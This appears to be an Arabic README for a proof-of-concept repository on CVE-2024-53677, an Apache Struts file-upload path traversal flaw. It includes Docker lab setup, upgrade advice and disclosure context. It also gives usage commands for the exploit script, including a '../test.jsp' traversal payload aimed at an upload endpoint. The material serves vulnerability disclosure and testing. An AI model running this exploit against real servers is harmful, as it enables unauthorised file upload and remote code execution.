
خلل في منطق رفع الملفات ضمن استغلال Apache Struts2
هذه المقالة هي مقالة بحثية منشورة بواسطة EQSTLab.
★ CVE-2024-53677 رفع غير مقيد لملف بنوع خطير وRCE PoC ★
cd docker
docker build --ulimit nofile=122880:122880 -m 3G -t cve-2024-53677 .
docker run -p 8080:8080 --ulimit nofile=122880:122880 -m 3G --rm -it --name cve-2024-53677 cve-2024-53677
11 ديسمبر : تم رفع PoC لرفع الملفات CVE-2024-53677
CVE-2024-53677 : منطق رفع الملفات في Apache Struts يعاني من خلل. يمكن للمهاجم التلاعب بمعاملات رفع الملفات لتمكين اجتياز المسارات (path traversal)، وفي بعض الظروف قد يؤدي ذلك إلى رفع ملف خبيث يمكن استخدامه لتنفيذ كود عن بُعد (Remote Code Execution). تؤثر هذه المشكلة على Apache Struts: من الإصدار 2.0.0 حتى ما قبل 6.4.0. يُنصح المستخدمون بترقية الإصدار إلى 6.4.0 على الأقل والانتقال إلى آلية رفع الملفات الجديدة https://struts.apache.org/core-developers/file-upload . إذا كنت لا تستخدم منطق رفع الملفات القديم القائم على FileuploadInterceptor، فإن تطبيقك آمن. يمكنك العثور على مزيد من التفاصيل في https://cwiki.apache.org/confluence/display/WW/S2-067.
git clone https://github.com/EQSTLab/CVE-2024-53677.git
cd CVE-2024-53677
pip install -r requirements.txt
# Upload the default file
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName>
# Upload Specified File
python CVE-2024-53677.py -u <URL> -p <top.UploadFileName> -f <File Path>
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp
python CVE-2024-53677.py -u http://localhost:8080/upload.action -p ../test.jsp -f ./test.txt
CVE-2024-53677.py
هذا المستودع ليس مخصصًا ليكون استغلال حقن كائنات (Object injection) لـ CVE-2024-53677. الهدف من هذا المشروع هو مساعدة الأشخاص على التعرف على هذه الثغرة الأمنية، وربما اختبار تطبيقاتهم الخاصة.
ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا. https://www.skshieldus.com/eng/business/insight.do